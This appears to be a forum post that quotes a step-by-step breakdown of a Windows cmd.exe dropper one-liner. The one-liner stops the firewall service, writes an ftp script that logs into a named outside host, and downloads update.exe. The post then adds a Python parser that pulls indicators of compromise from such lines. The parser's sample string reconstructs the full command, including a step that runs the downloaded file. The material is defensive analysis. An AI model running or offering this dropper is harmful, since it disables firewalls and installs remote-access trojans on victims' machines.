AWR
Veteran Member
 
Join Date: Jun 2005
Location: State of Flux
 
2007-04-13, 03:44

Quote:
Originally Posted by chucker
Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT, including Windows XP and Vista (in DOS / Windows 9x, this was command.com). The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: invokes the FTP program, to which those commands are then passed. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
Nice work, Kojack. Here's a lollipop.
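The one-liner chucker takes apart above is a classic echo-to-ftp-script dropper: stop the SharedAccess service (on XP that is the "Windows Firewall/Internet Connection Sharing (ICS)" service, so the firewall goes down), build an ftp.exe script line by line with echo and shell redirection, run ftp.exe against it (-n suppresses auto-login so the script's user line does the login, -v suppresses the server's responses, -s:file reads the commands from the file), and restart the service afterwards. When one of these turns up in a log or a process-creation event, the first job is to pull out the indicators. The following Python parser is an added example, not code from the thread or from either poster: it splits the cmd.exe line on the & separators, rebuilds the ftp script from the echo redirects, and reports stopped/started services, FTP host, port, credentials, fetched files and whether a fetched file is then executed. The sample command line is constructed from the breakdown in the post; the script file name i, the del i step and the running of update.exe are assumptions, since the original string is not reproduced on the page.

```python
"""Extract indicators from a cmd.exe echo-to-ftp-script dropper one-liner.

Added example; SAMPLE is constructed from chucker's breakdown and is not the
string the thread analysed (the script file name "i", the "del i" step and
the execution of update.exe are assumptions).
"""
import json
import re
from typing import Dict, List

# Constructed sample.  Host, credentials, service and file name come from the
# post; the script file name "i", "del i" and running update.exe are assumed.
SAMPLE = (
    "cmd /c net stop sharedaccess &echo open ftp.holmenhast.se 21 >i"
    "&echo user ftp.holmenhast.se f1634163f >>i&echo binary >>i"
    "&echo get update.exe >>i&echo bye >>i&ftp -n -v -s:i&del i"
    "&update.exe&net start sharedaccess"
)

# echo <text> > file   (truncate)   or   echo <text> >> file   (append)
ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.IGNORECASE)
NET_RE = re.compile(r"^net\s+(stop|start)\s+(\S+)", re.IGNORECASE)
FTP_RE = re.compile(r"^ftp\b(.*)$", re.IGNORECASE)
SCRIPT_RE = re.compile(r"-s:(\S+)", re.IGNORECASE)   # ftp.exe -s:<scriptfile>


def split_cmd(line: str) -> List[str]:
    """Split a cmd.exe line on '&' separators, dropping a leading 'cmd /c'."""
    line = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", line, flags=re.IGNORECASE)
    return [seg.strip() for seg in line.split("&") if seg.strip()]


def parse_ftp_script(lines: List[str]) -> Dict[str, object]:
    """Interpret the reconstructed ftp.exe script (open / user / get lines)."""
    info: Dict[str, object] = {"host": None, "port": 21, "user": None,
                               "password": None, "downloads": []}
    for raw in lines:
        parts = raw.split()
        if not parts:
            continue
        verb, args = parts[0].lower(), parts[1:]
        if verb == "open" and args:            # open <host> [port]
            info["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                info["port"] = int(args[1])
        elif verb == "user" and args:          # user <name> [password]
            info["user"] = args[0]
            if len(args) > 1:
                info["password"] = args[1]
        elif verb in ("get", "mget") and args:  # files pulled from the server
            info["downloads"].extend(args)
    return info


def analyse(cmdline: str) -> Dict[str, object]:
    """Walk the segments in order and collect the indicators of compromise."""
    scripts: Dict[str, List[str]] = {}     # redirect target -> script lines
    downloads: List[str] = []
    result: Dict[str, object] = {"services_stopped": [], "services_started": [],
                                 "ftp": None, "script_file": None, "executed": []}
    for seg in split_cmd(cmdline):
        m = ECHO_RE.match(seg)
        if m:                                  # rebuild the script file
            text, op, target = m.groups()
            if op == ">":                      # '>' truncates, '>>' appends
                scripts[target] = []
            scripts.setdefault(target, []).append(text)
            continue
        m = NET_RE.match(seg)
        if m:
            key = "services_stopped" if m.group(1).lower() == "stop" else "services_started"
            result[key].append(m.group(2).lower())
            continue
        m = FTP_RE.match(seg)
        if m:
            s = SCRIPT_RE.search(m.group(1))
            if s:
                result["script_file"] = s.group(1)
                result["ftp"] = parse_ftp_script(scripts.get(s.group(1), []))
                downloads = list(result["ftp"]["downloads"])
            continue
        # A segment naming a fetched file (bare or via 'start') means it is run.
        words = seg.split()
        first = words[0].lower()
        if first == "start" and len(words) > 1:
            first = words[1].lower()
        if first in [d.lower() for d in downloads]:
            result["executed"].append(first)
    return result


if __name__ == "__main__":
    print(json.dumps(analyse(SAMPLE), indent=2))
```

The parser deliberately reconstructs the script from the redirects rather than looking for a fixed string, so variants that change the file name, the order of the echo lines or the service being stopped are still decoded; a line with no ftp -s: invocation yields "ftp": None and is left alone.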